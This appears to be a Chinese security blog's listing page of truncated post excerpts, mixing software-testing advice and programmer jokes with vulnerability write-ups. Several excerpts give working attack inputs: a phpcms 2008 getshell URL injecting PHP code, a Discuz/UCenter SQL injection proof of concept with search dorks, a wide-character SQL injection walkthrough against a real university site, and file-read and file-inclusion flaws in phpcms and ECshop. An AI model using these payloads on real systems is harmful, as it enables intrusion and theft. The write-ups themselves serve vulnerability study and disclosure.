人文创业

软件功能测试的步骤

发表于5年前 | 作者: seay

4
最近有和一个初学测试的朋友聊天,他说关于测试方面的书看来不少,理论和概念也背了不少,但是实际测试时还是不知道怎么怎么下手,不知具体该如何做? 其实关于怎么入手做测试,没有什么具体的规范,以下是我的个人习惯,供大家讨论一下。   面对一个新的项目,应该从项目的编写需求分析时参与进去,了解项目的背景和用户的需求,然后根据项目的开发进度,编写测试计划;测试计划要包含以下内容:测试......

人文创业

测试工程师如何与开发工程师和谐交流

发表于5年前 | 作者: seay

2
作为测试工程师,在日常工作中接触最多的当然是团队中的开发工程师,如何和开发工程师进行有效的交流是测试工程师面对的重要问题。一般来说,在一个团队中,总是有开发人员喜欢和不喜欢的测试工程师,这两者之间的工作效率和效果都有很大的差异。当然,不能武断地说测试人员不喜欢的测试工程师就一定是效率低下的测试工程师,或者说是不合格的测试工程师,但一般来说,那些容易得到开发人员认可的工程师......

实用工具

thinkphp 2.1最新漏洞

发表于5年前 | 作者: seay

5
thinkphp 2.1的版本 我们来分析下漏洞吧 官方发布了一个安全补丁 表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php   125 – $res = preg_replace(‘@(w+)’.$depr.’([^’.$depr.’/]+)@e’, ‘$var[‘1′]=”2″;’, implode($depr,$paths)); 125 + $res = preg_replace(‘@(w+)’.$depr.’([^’.$depr.......

实用工具

phpcms 2008 getshell漏洞连接方法

发表于5年前 | 作者: seay

1
关于phpcms 2008 getshell漏洞  拿shell http://www.wooyun.org/bugs/wooyun-2010-09563 这个   注册企业会员 然后链接放exp  info就出来了 EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>   不过呢  写一句话 shell   那样的话 用菜刀链接 就不行。。   这里找到一个好方法 就是。。写在目录下......

实用工具

phpcms V9最新任意读文件漏洞

发表于5年前 | 作者: seay

2
漏洞版本: phpcms V9 漏洞描述: phpcms v9的phpcmsmodulessearchindex.php存在任意文件读取漏洞 漏洞代码如下: public function public_get_suggest_keyword() { $url = $_GET['url'].'&amp;q='.$_GET['q']; $res = @file_get_contents($url); if(CHARSET != 'gbk') { $res = iconv('gbk', CHARSET, $res); } echo $res; } <* ......

渗透测试

安乐业v3.0网站程序代码审计

发表于5年前 | 作者: seay

2
某基友在某地门户上班..网站总让人日..so..让吾等小菜帮忙看一下   菜文 勿喷  抛砖引玉专用   只是粗略瞄了几眼..坑啊..   commonlibFCKeditoreditorfilemanageruploadphpconfig.php   $Config[‘AllowedExtensions’][‘File’] = array() ; $Config[‘DeniedExtensions’][‘File’] = array (‘php’,’php2′,’php3′,......

编程开发

1
先看这一段简单的代码 <?php session_start();$_SESSION[‘isadmin’]=’yes’;$isadmin=’no’;echo $_SESSION[‘isadmin’];?> 当php.ini里配置register_globals = Off 时, 没任何问题, 输出yes但是 当php.ini里配置register_globals = On 的时候, 第一次运行输出yes 而刷新一下,则显示的是no显然这是不正常的, 这是个很奇怪的问题, 如果说是$is......

编程开发

php全局变量漏洞 $GLOBALS

发表于5年前 | 作者: seay

0
在Discuz代码中有这么一段: if (isset($_REQUEST[‘GLOBALS’]) OR isset($_FILES[‘GLOBALS’])) {  exit(‘Request tainting attempted.’); } register_globals 是php中的一个控制选项,可以设置成off或者on ,默认为off,决定是否将EGPCS(Environment,GET,POST,Cookie,Server)变量注册为全局变量。 如果register_globals打开的话, 客户端提交的数据中含有GLOBA......

科普专线

程序员的一些幽默笑话

发表于5年前 | 作者: seay

0
1、程序猿最烦两件事,第一件事是别人要他给自己的代码写文档,第二件呢?是别人的程序没有留下文档。 2、程序猿的读书历程:x 语言入门 —> x 语言应用实践 —> x 语言高阶编程 —> x 语言的科学与艺术 —> 编程之美 —> 编程之道 —> 编程之禅—> 颈椎病康复指南。 3、还没上大学的时候,高三暑假,跑到家那边的图书城想买传说中的C++的书,然后看到一本C#,我一看,嘿,这个++还写得挺......

渗透测试

一次反渗透手记

发表于5年前 | 作者: seay

0
作者:花开、若相惜 Pax.Mac Team核心成员 由于某著名游戏公司被人DDOS,让我们公司追查DDOS来源。话说现在DDOS还真没办法防御。那公司20G直接挂了。 定位了一个攻击来源,因为离的比较近,所以从这里下手。 经过初步的信息收集,旁注都是目标公司的站。开放在各个端口,有asp,php的站。服务器:Apache+IIS+win2003 mysql root密码为空。 既然mysql密码为空,那么就试试能不能外连:mysql -h ip -uroot -p 连接......

安全运营

运用动态安全域保护企业网的方法

发表于5年前 | 作者: seay

4
网络安全域是指同一系统内有相同的安全保护需求、相互信任,并具有相同的安全访问控制和边界控制策略的子网或网络,相同的网络安全域共享一样的安全策略。网络安全域从广义上可理解为具有相同业务要求和安全要求的IT系统要素的集合。     网络安全域从大的方面一般可划分为四个部分:本地网络、远程网络、公共网络、伙伴访问。传统的安全域之间需要设置防火墙以进行安全保护。本地网络域的安全内容有......

实用工具

Discuz7.X通杀0day漏洞(UCenter Home-2.0)

发表于5年前 | 作者: seay

0
*/ Author : KnocKout */ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers */ Contact: knockoutr@msn.com */ Cyber-Warrior.org/CWKnocKout Dork : Powered by UCenter inurl:shop.php?ac=view Dork 2 : inurl:shop.php?ac=view&amp;shopid= Vuln file : Shop.php =================================================================== 利用POC shop.php?ac=view&shopid=4 and (select 1......

渗透测试

一次宽字符注入渗透过程

发表于5年前 | 作者: seay

1
站点:http://xxxx.xxxx.edu.cn 注入点:http://xxxxx.xxxxx.edu.cn/news_view.php?id=94 提交 %bf’ 出现错误,由此可见存在宽字节注入 接着 %bf%27 and1=1 %23 正确返回 %bf%27 order by 10 %23 返回正确 判断当前页面字段数当前页面字段数为10 接着渗透 %bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23 返回正确 返回3 9 用database() 爆出 数据库名字为 international 直接爆......

实用工具

ECshop本地包含漏洞

发表于5年前 | 作者: seay

0
js/calendar.php $lang = (!empty($_GET[‘lang’])) ? trim($_GET[‘lang’]) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x......